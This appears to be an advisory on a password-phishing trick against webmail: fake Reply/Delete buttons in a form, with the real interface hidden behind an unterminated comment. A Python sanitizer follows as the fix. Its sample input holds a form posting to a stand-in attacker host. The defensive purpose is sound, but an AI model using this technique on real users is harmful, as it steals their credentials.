Exploit:
Makes it possible to steal passwords from users of some free Web-based email sites including Yahoo Mail, USA.net and MailExcite. (Some of these services may have fixed the problem since this writing.)
Requirements:
You have to send an email message to the user's account at, for example,
Yahoo.com. When they log in to read their mail and click the "Reply" or
"Delete" button at the bottom of the message, Yahoo Mail appears to prompt
them within the same window, "Session timeout: Please re-enter your
password". When the password is re-entered, it is sent to a hostile
site and the user continues reading their mail without noticing anything
unusual.
Yahoo! Mail does not re-write the "action" attribute of a <FORM> tag contained in an email message when that message is displayed to the user. Yahoo Mail is smart enough to insert a "target" attribute into a link, for example, so that when you click on a link that someone sends you, it opens in a separate browser window. (This way, you can't fool the user into thinking that they're still inside Yahoo Mail and give them a message like "please re-enter your password".) However, their mail parser does not re-write the <FORM> "action" attribute. (HotMail, on the other hand, does re-write the "action" attribute so this trick won't work.) That means when you click to submit a form inside an HTML email message, the result will be displayed in the same frame.
In order to get the user to submit a form within the Yahoo Mail message, make them think they're clicking on the "Reply" or "Delete" button provided by the Yahoo Mail interface. It's easy to figure out how the Yahoo Mail HTML interface is formatted, so in your HTML message, you just insert your own buttons, tables, etc. to look exactly like the bottom half of the real Yahoo message-reading interface. Follow this with an HTML opening comment "<!--" so that the *real* bottom half of the interface will be hidden. If the user clicks on the "Reply" or "Delete" buttons at the bottom instead of the ones at the top, they'll really be submitting your form.
So, combine these two tricks -- send the user an HTML email message that replaces the buttons at the bottom half of the Yahoo mail interface with your own custom buttons, in a form whose "action" URL is an off-site page (and use a comment "<!--" to hide the real bottom half of the interface). Then, when the user clicks one of those buttons, the form submission will re-direct the user to the off-site page -- all staying within the same frame of the Yahoo Mail interface, so the user thinks they never left Yahoo Mail. The off-site page can say "Timeout, please re-enter your password..."
Suggested fix for Yahoo Mail and other free Web-based email sites:
Yahoo Mail should automatically add a "target" attribute to any <FORM> tag in an email message, so that when the user fills out a form, the results will open in a new browser window, with the real location visible in the Location bar.
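The following is an added example, not code from the advisory or from any of the mail providers it names, showing what the suggested fix looks like when applied by the mail display layer: every <FORM> (and <A>) tag in a message body gets a server-controlled target="_blank", any sender-supplied "target" is discarded, sender comments are dropped, and an unterminated "<!--" (the trick used above to hide the real bottom half of the interface) is cut off so the provider's own interface markup that follows the body renders normally. The sample message, the sanitizer class and the helper names are all constructed for this example; the only library used is Python's standard html.parser.

```python
"""Rewrite HTML email bodies so embedded forms cannot submit inside the mail frame.

Added example (not the advisory's or any provider's code). Mitigation demonstrated:
  1. force target="_blank" on <form> and <a>, overriding whatever the sender set;
  2. drop all sender comments and declarations;
  3. truncate the body at an unterminated "<!--" so it cannot swallow the
     interface markup the mail site appends after the message.
"""
from html.parser import HTMLParser
import html

# Tags whose navigation/submission must leave the mail frame.
TARGETED_TAGS = {"form", "a"}


def close_dangling_comment(body: str) -> str:
    """Cut the body at the first '<!--' that has no matching '-->'.

    A dangling comment would otherwise hide everything the mail site
    appends after the message (its own Reply/Delete buttons included).
    """
    pos = 0
    while True:
        start = body.find("<!--", pos)
        if start == -1:
            return body
        end = body.find("-->", start + 4)
        if end == -1:
            return body[:start]
        pos = end + 3


class MailFormSanitizer(HTMLParser):
    """Re-serialises the message, forcing a safe target on forms and links."""

    def __init__(self) -> None:
        # convert_charrefs=False so entities are passed through untouched.
        super().__init__(convert_charrefs=False)
        self.out: list[str] = []

    def _render(self, tag: str, attrs, self_closing: bool) -> str:
        if tag in TARGETED_TAGS:
            # Discard any sender-supplied target (e.g. target="_self") and
            # append the server-controlled one so it cannot be overridden.
            attrs = [(k, v) for k, v in attrs if k.lower() != "target"]
            attrs.append(("target", "_blank"))
        parts = [tag]
        for k, v in attrs:
            # HTMLParser hands us unescaped values; re-escape on output.
            parts.append(k if v is None else f'{k}="{html.escape(v, quote=True)}"')
        return "<" + " ".join(parts) + (" />" if self_closing else ">")

    def handle_starttag(self, tag, attrs):
        self.out.append(self._render(tag, attrs, self_closing=False))

    def handle_startendtag(self, tag, attrs):
        self.out.append(self._render(tag, attrs, self_closing=True))

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    # Sender-supplied comments, doctypes and processing instructions are dropped.
    def handle_comment(self, data):
        pass

    def handle_decl(self, decl):
        pass

    def unknown_decl(self, data):
        pass

    def handle_pi(self, data):
        pass


def sanitize_mail_html(body: str) -> str:
    """Full pipeline: close dangling comments, then rewrite the markup."""
    parser = MailFormSanitizer()
    parser.feed(close_dangling_comment(body))
    parser.close()
    return "".join(parser.out)


# Constructed sample resembling the message described in the advisory: a form
# whose action points off-site, followed by an unterminated comment.
SAMPLE_MESSAGE = (
    "<p>Hi!</p>"
    '<form action="http://attacker.example/collect" method="post" target="_self">'
    '<input type="submit" value="Reply"> <input type="submit" value="Delete">'
    "</form>"
    "<!-- everything the mail site appends after this point would be hidden"
)

if __name__ == "__main__":
    print(sanitize_mail_html(SAMPLE_MESSAGE))
```

With the sample input the output keeps the form but ends at `</form>` with `target="_blank"` forced onto it, so a submission opens in a new window whose Location bar shows the real off-site address, and the provider's own buttons are no longer commented out. A stricter policy, which many mail interfaces adopt, is to remove `<form>` elements from message bodies altogether; the rewrite shown here is the minimal change the advisory proposes.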